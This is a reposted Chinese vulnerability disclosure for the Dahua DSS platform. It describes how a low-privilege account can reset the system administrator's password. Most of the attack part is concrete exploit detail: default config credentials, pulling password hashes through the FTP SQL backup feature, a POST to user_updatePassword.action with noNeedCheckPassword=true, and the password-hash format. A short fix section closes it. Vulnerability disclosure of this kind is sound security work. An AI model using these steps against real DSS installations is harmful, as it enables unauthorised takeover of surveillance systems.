记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华
«口令即漏洞 放弃它吧...
兴业银行某重要站点SQL注入(ROOT权限)... »

大华DSS平台低权限账户越权直接修改system密码

2016-07-12 21:15

被测试DSS版本信息:V3.11.003.R.20150929.374164

前提:拥有config配置用户名密码



一.取得所有用户名



1.进入config管理界面

地址:http://[IP]/config/user_toLoginPage.action

默认用户名admin密码123456



2.配置自动SQL备份FTP服务器

QQ截图20160410191027.jpg



3.等待自动备份

4.从备份的SQL文件中获得所有账户的用户名,密码(MD5)

QQ截图20160410190748.jpg



5. 测试账户弱口令,取得一个低权限账户

二.

1.web登录低权限账户(获得登录cookie)

QQ截图20160410191152.jpg





2.POST提交强制修改密码的url(保持低权限账户的cookie)

我直接用的火狐在浏览器中提交的

QQ截图20160410191503.jpg





code 区域
http://【IP】/admin/user_updatePassword.action?nowTime=【时间戳】



POST信息:

code 区域
noNeedCheckPassword=true

userBean.loginName=system       被改密码的用户名

userBean.id=1被改的用户ID(数据文件中获取)

userBean.newLoginPass=7e9038a26b85dc9b7d5089a1b1d7e00c     新密码MD5



MD5加密格式:

code 区域
用户名:DSS:密码



(逆向JS所得)





三.完毕



漏洞证明:

经核实:所用的低权限账号是没有管理员权限的

QQ截图20160410191611.jpg





QQ截图20160410191642.jpg

修复方案:

弱口令和默认修改下可以简单解决



修改密码的提交增加权限认证

知识来源: www.wooyun.org/bugs/wooyun-2016-0194741

阅读:129831 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“大华DSS平台低权限账户越权直接修改system密码”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

随机推荐

标签云

本页关键词